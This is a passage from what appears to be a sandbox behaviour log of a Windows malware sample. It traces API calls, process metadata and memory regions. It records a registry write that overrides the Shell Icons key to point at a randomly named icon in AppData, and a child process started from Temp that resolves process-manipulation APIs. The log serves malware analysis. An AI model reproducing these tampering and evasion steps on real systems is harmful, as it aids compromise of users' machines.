wMatch=0x6f) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.554] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0116.555] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0116.555] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0116.556] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0116.556] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0116.556] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0116.556] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0116.556] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.556] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.556] StrChrIW (lpStart="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.556] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0116.557] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\CurrentVersion\\Explorer\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Explorer\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Explorer\\Shell Icons", wMatch=0x5c) returned="\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Shell Icons", wMatch=0x5c) returned 0x0 [0116.557] SetLastError (dwErrCode=0x490) [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] SetLastError (dwErrCode=0x0) [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0116.558] lstrlenW (lpString="29") returned 2 [0116.558] lstrlenW (lpString="29") returned 2 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x39) returned 0x0 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0116.558] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0116.558] lstrlenW (lpString="REG_SZ") returned 6 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0116.688] LocalFree (hMem=0x2ee330) returned 0x0 [0116.688] SetLastError (dwErrCode=0x0) [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0116.689] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0116.689] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0116.689] lstrlenW (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0") returned 72 [0116.689] SetLastError (dwErrCode=0x0) [0116.689] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x10f99c, lpdwDisposition=0x10f974 | out: phkResult=0x10f99c*=0x50, lpdwDisposition=0x10f974*=0x2) returned 0x0 [0116.689] RegQueryValueExW (in: hKey=0x50, lpValueName="29", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0116.689] lstrlenW (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0") returned 72 [0116.689] RegSetValueExW (in: hKey=0x50, lpValueName="29", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0", cbData=0x92 | out: lpData="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0") returned 0x0 [0116.689] RegCloseKey (hKey=0x50) returned 0x0 [0116.690] SetLastError (dwErrCode=0x0) [0116.690] GetLastError () returned 0x0 [0116.690] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x10f948, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x2238\x2f\xf954\x10\x3176\xf7\xfa10\x10\x3753\xf7") returned 0x27 [0116.691] GetLastError () returned 0x0 [0116.691] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0116.691] SetLastError (dwErrCode=0x0) [0116.691] LocalFree (hMem=0x2f2238) returned 0x0 [0116.691] __iob_func () returned 0x76b32900 [0116.691] _fileno (_File=0x76b32920) returned 1 [0116.691] _errno () returned 0x1307d8 [0116.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.691] _errno () returned 0x1307d8 [0116.691] GetFileType (hFile=0x7) returned 0x2 [0116.691] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.691] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x10f908 | out: lpMode=0x10f908) returned 1 [0116.691] __iob_func () returned 0x76b32900 [0116.691] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.691] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0116.691] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2f23f0*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x10f930, lpReserved=0x0 | out: lpBuffer=0x2f23f0*, lpNumberOfCharsWritten=0x10f930*=0x27) returned 1 [0116.694] exit (_Code=0) Process: id = "57" image_name = "w588h5dn.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe" page_root = "0x7ea16780" os_pid = "0xe5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xe10" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8404 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8405 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8406 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 8407 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8408 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8409 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8410 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8411 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 8412 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8492 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8493 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8494 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8495 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 8496 start_va = 0x710000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 8497 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8498 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8499 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 8500 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8501 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8502 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8503 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8504 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8505 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8506 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8507 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8508 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8509 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8510 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8511 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8512 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8513 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8562 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8563 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 8564 start_va = 0x2c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 8565 start_va = 0x810000 end_va = 0x140ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 8566 start_va = 0x520000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 8608 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8609 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8610 start_va = 0x660000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 8611 start_va = 0x1410000 end_va = 0x16defff entry_point = 0x1410000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8612 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 8613 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8621 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x3d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 8622 start_va = 0x16e0000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x00000000016e0000" filename = "" Region: id = 8623 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8624 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8625 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8626 start_va = 0x17e0000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 8627 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8628 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8677 start_va = 0x17e0000 end_va = 0x18dffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 8678 start_va = 0x1930000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 8679 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8680 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 91 os_tid = 0xe60 [0116.991] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.991] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0116.991] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0116.991] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 